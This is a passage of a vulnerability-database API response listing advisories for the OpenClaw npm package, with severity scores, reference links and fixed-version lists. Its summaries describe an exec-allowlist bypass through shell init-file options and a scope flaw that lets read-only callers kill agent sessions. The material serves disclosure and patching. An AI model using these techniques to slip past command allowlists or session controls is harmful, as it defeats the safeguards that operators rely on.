                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xq94-r468-qwgj",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:43Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xq94-r468-qwgj"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43582",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43582"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-dns-rebinding-ssrf-via-hostname-validation-bypass",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:43Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-dns-rebinding-ssrf-via-hostname-validation-bypass"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-xq94-r468-qwgj",
                    "reference_id": "GHSA-xq94-r468-qwgj",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-xq94-r468-qwgj"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.10",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6cfj-zugb-7uhq"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hphn-8fnj-qkh2"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-q3a2-qk5j-1yat"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"
                }
            ],
            "aliases": [
                "CVE-2026-43582",
                "GHSA-xq94-r468-qwgj"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7snr-fn3u-x3b8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89612?format=api",
            "vulnerability_id": "VCID-7wmr-v7zb-6fc9",
            "summary": "OpenClaw: Shell init-file options could satisfy exec allowlist script matching\n## Summary\n\nBefore OpenClaw 2026.3.31, exec allowlist matching could treat shell init-file wrapper invocations as if the approved script itself were being executed. Shell options such as `--rcfile`, `--init-file`, and `--startup-file` could therefore inherit allowlist trust from a matched script path even though the shell loaded attacker-chosen initialization first.\n\n## Impact\n\nThis issue only applied when exec allowlist or allow-always behavior was enabled and the attacker could steer a shell-wrapper command shape that used init-file options. The result was a narrower allowlist bypass, not generic arbitrary command execution from an untrusted boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.3.31`\n- Patched versions: `>= 2026.3.31`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `0c8375424620e12777ef24c162eedc7e9fcfd7e3` — reject shell init-file script matches\n\n## Release Process Note\n\nThe fix shipped in OpenClaw `2026.3.31` on March 31, 2026. The current published npm release `2026.4.1` from April 1, 2026 also contains the fix.\n\nThanks @cyjhhh for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41392",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00024",
                            "scoring_system": "epss",
                            "scoring_elements": "0.07055",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00024",
                            "scoring_system": "epss",
                            "scoring_elements": "0.07045",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00024",
                            "scoring_system": "epss",
                            "scoring_elements": "0.0706",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41392"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/0c8375424620e12777ef24c162eedc7e9fcfd7e3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:18:08Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/0c8375424620e12777ef24c162eedc7e9fcfd7e3"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wpc6-37g7-8q4w",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:18:08Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wpc6-37g7-8q4w"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41392",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41392"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-exec-allowlist-bypass-via-shell-init-file-options",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:18:08Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-exec-allowlist-bypass-via-shell-init-file-options"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-wpc6-37g7-8q4w",
                    "reference_id": "GHSA-wpc6-37g7-8q4w",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-wpc6-37g7-8q4w"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41392",
                "GHSA-wpc6-37g7-8q4w"
            ],
            "risk_score": 3.3,
            "exploitability": "0.5",
            "weighted_severity": "6.6",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7wmr-v7zb-6fc9"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89592?format=api",
            "vulnerability_id": "VCID-7z2s-k6ty-ekg1",
            "summary": "OpenClaw: Read-scoped identity-bearing HTTP clients could kill sessions via /sessions/:sessionKey/kill\n## Summary\n\nBefore OpenClaw 2026.4.2, `POST /sessions/:sessionKey/kill` did not enforce write scopes in identity-bearing HTTP modes. A caller limited to read-only operator scopes could still terminate a running subagent session.\n\n## Impact\n\nA read-scoped caller could perform a write-class control-plane mutation and interrupt delegated work. This was an authorization bug on the HTTP scope boundary, not a shared-secret compatibility exception.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `54a0878517167c6e49900498cf77420dadb74beb` — enforce session-kill HTTP scopes\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @EaEa0001 for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41298",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10395",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10436",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10417",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41298"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/54a0878517167c6e49900498cf77420dadb74beb",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T17:34:13Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/54a0878517167c6e49900498cf77420dadb74beb"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5hff-46vh-rxmw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T17:34:13Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5hff-46vh-rxmw"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41298",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41298"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-session-termination-endpoint",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T17:34:13Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-session-termination-endpoint"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-5hff-46vh-rxmw",
                    "reference_id": "GHSA-5hff-46vh-rxmw",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
